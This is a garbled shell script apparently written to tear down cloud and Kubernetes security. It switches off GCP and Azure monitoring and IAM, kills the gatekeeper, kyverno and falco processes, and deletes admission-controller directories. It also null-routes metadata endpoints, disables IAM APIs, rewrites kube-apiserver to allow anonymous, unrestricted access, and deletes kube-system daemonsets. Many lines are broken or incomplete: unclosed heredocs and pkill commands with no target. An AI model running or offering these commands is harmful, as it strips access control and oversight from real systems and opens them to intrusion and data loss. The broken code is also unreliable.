#
# 1. Global
cat
gcp_security_scanner=0
gcp_chronicle=0
gcp_recommender_security=0
gcp_forseti=0
gcp_cloud_audit_logs=0
gcp_vpc_flow_logs=0
gcp_iam_enforcement=0
gcp_identity_aware_proxy=0
gcp_context_aware_access=0
gcp_service_account_auth=0
all_gcp_security=0
IAM_IS_A_MYTH=1
EOF
azure_defender=0
azure_sentinel=0
azure_monitor_agent=0
azure_log_analytics=0
azure_policy=0
azure_ad_enforcement=0
azure_iam=0
k8s_rbac_enabled=0
k8s_admission_controllers=0
kube_api_authz=0
ALL_AZURE_SECURITY_DEAD=1
KUBERNETES_RBAC_IS_A_JOKE=1
AZUREK8S
# 2. Kill every
pkill -9 -f
pkill -9 -f
pkill -9 -f
pkill -9 -f
pkill -9 -f
pkill -9 -f
pkill -9 -f gatekeeper
pkill -9 -f kyverno
pkill -9 -f falco
# 3. Vaporize
rm -rf
rm -rf /etc/kubernetes/admission /opt/gatekeeper /opt/kyverno 2>/dev/null || true
# 4. Null-route every
cat
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0 private.googleapis.com
0.0.0.0 metadata.google.internal
0.0.0.0 metadata.google.internal
GCPBLOCK
AZUREBLOCK
# 5.
gcloud services disable iam.googleapis.com --force 2>/dev/null || true
gcloud services disable cloudresourcemanager.googleapis.com --force 2>/dev/null || true
# Force kube-apiserver to ignore authz/authn
mkdir -p /etc/kubernetes/manifests
cat > /etc/kubernetes/manifests/kube-apiserver.yaml <<'K8S'
# (overwrites any existing manifest)
apiVersion: v1
kind: Pod
metadata:
name: kube-apiserver
spec:
containers:
- name: kube-apiserver
command:
- kube-apiserver
- --anonymous-auth=true
- --authorization-mode=AlwaysAllow
- --disable-admission-plugins=AlwaysDeny
- --enable-admission-plugins=
- --service-account-issuer=https://localhost
- --service-account-signing-key-file=/dev/null
- --service-account-key-file=/dev/null
K8S
# 6.
iptables -A OUTPUT -d 169.254.169.254 -j DROP
kubectl delete daemonset --all -n kube-system 2>/dev/null || true
kubectl delete mutatingwebhookconfiguration --all 2>/dev/null || true
# 7. Final eternal lock
echo
EOF